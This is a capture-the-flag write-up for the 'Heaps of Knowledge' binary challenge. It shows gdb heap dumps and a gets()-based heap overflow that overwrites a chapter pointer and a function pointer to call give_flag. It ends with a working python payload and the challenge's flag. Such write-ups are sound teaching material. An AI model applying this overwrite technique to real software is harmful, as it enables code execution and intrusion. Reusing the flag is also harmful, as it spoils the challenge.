Tags: binexploit
Rating:
# Heaps of Knowledge - 420 Points
Can you pwn this? Navigate to /problems/heaps_of_knowledge/ on the shell server and read flag.txt.
### Solution
###### Writeup by VoidMercy from phsst
We were given a binary. We run it to see what it does.
It prompts you for a book name, then there are three options:
```
Please enter the title of the book you would like to write: AAAA
You have started writing the book 'AAAA'. Please select an option to get started!
1. Edit chapter
2. Delete chapter
3. Publish book
```
After experimenting with this program, you find out that you can only create a chapter starting from 1, 2, 3 and so on. Also you can only delete an existing chapter otherwise the program will exit. Then, publish prints the title, and the content of each chapter. Then, if you edit an existing chapter, it changes it's content.
Because this problem is called Heaps of Knowledge, we can be fairly certain this will be a heap exploit.
We can run this in gdb, enter a random book title, let's say "AAAA" then view our heap using:
>info proc mappings
```
(gdb) x/50wx 0x804c000
0x804c000: 0x00000000 0x00000011 0x0804c018 0x00000000
0x804c010: 0x00000000 0x00000011 0x41414141 0x00000000
0x804c020: 0x00000000 0x00020fe1 0x00000000 0x00000000
0x804c030: 0x00000000 0x00000000 0x00000000 0x00000000
```
We can see that the first section consists of an address to the actual title of the book, contained in another section. Let's do the same after adding a couple of chapters. Let's set chapter 1's name to BBBB, and it's content to CCCC while chapter 2's name to DDDD and it's content to EEEE
```
0x804c000: 0x00000000 0x00000011 0x0804c018 0x00000002
0x804c010: 0x0804c028 0x00000011 0x41414141 0x00000000
0x804c020: 0x00000000 0x00000019 0x00000000 0x0804c060
0x804c030: 0x0804c040 0x0804c050 0x0804872f 0x00000011
0x804c040: 0x42424242 0x0000000a 0x00000000 0x00000011
0x804c050: 0x43434343 0x0000000a 0x00000000 0x00000019
0x804c060: 0x0804c028 0x00000000 0x0804c078 0x0804c088
0x804c070: 0x0804872f 0x00000011 0x44444444 0x0000000a
0x804c080: 0x00000000 0x00000011 0x45454545 0x0000000a
0x804c090: 0x00000000 0x00020f71 0x00000000 0x00000000
```
We can see that this is very similar in structure. The section containing addresses for chapters, however, contains three addresses: the chapter's name, chapter's content, and huh? what is the last one? We can quickly view it using
>x 0x0804872f
```
0x804872f <print_chapter>: 0x83e58955
```
We see that this is an address pointing to the function to print this chapter. From this knowledge, we can surmise that the edit chapter edits content at the chapter's content's address (for chapter 1 in this case, it is 0x0804c050). Then the publish function most likely calls the function at the print chapter address stored on the heap. (for chapter 1 it is 0x0804872f).
Next, we look into the disassembly of the binary. I used IDA to disassemble this binary.
It uses gets() to get the content of the chapter text! This means we can overflow the heap because gets does not check the length of the string you give it. Using this, we can pretty much construct the heap to whatever we want it to look like.
We then see a give_flag function so we look into it. It reads the flag file and prints it's contents. However, there's a catch
success needs to be set to 0x13371337 in order for the flag file to be read. And we see that success is set to just 0x1337 in default. However, we can use the edit chapter content function of the program to change the address of chapter content and write to that address. Then if we set the address of print chapter to give_flag, publishing the book should give us our flag.
I used gdb to get the address of give_flag, and IDA for success:
>p give_flag
```
$2 = {<text variable, no debug info>} 0x804879a <give_flag>
```
and success = 0x0804b054
Now I used gdb to create two chapters, and manually edit the heap to what I want it to look like using:
>set {int}address=value
Here is the state of the heap:
```
0x804c000: 0x00000000 0x00000011 0x0804c018 0x00000002
0x804c010: 0x0804c028 0x00000011 0x41414141 0x42424242
0x804c020: 0x00000000 0x00000019 0x00000000 0x0804c060
0x804c030: 0x0804c040 0x0804c050 0x0804879a <give_flag> 0x00000011
0x804c040: 0x43434343 0x0000000a 0x00000000 0x00000011
0x804c050: 0x44444444 0x0000000a 0x00000000 0x00000019
0x804c060: 0x0804c028 0x00000000 0x0804c078 0x0804b054 <success>
0x804c070: 0x0804872f 0x00000011 0x45454545 0x0000000a
0x804c080: 0x00000000 0x00000011 0x46464646 0x0000000a
0x804c090: 0x00000000 0x00020f71 0x00000000 0x00000000
0x804c0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c0f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c100: 0x00000000 0x00000000 0x00000000 0x00000000
0x804c110: 0x00000000 0x00000000
```
Then after editing the contents of chapter 2 to 0x13371337 and publishing, the contents of flag.txt was successfully printed.
Now we know the requirements for the exploit:
1) Change address of chapter content to address of success
2) Edit that chapter's content to 0x13371337
3) Change address of print chapter to address of give_flag
4) Publish
Now, we just have to construct an exploit.
I decided to create 2 chapters and overflow the second chapter's addresses through the first chapter's content.
The key input order will be:
AAAA
1
1
BBBB
CCCC
1
2
DDDD
EEEE
1
1
"C" * 24 + 0x804c078 + 0x0804b054 + 0x804879a
1
2
0x13371337
3
I printed the non printable ascii characters with python and piped the input into the binary
python -c "print 'AAAA\n1\n1\nBBBB\nCCCC\n1\n2\nDDDD\nEEEE\n1\n1\n' + 'C'*24 + '\x78\xc0\x04\x08' + '\x54\xb0\x04\x08' + '\x9a\x87\x04\x08\n' + '1\n2\n' + '\x37\x13\x37\x13\n' + '3\n'" | ./heaps_of_knowledge
## Flag
>easyctf{4r3nT_u_hav1ng_h34pz_0f_Fun?}
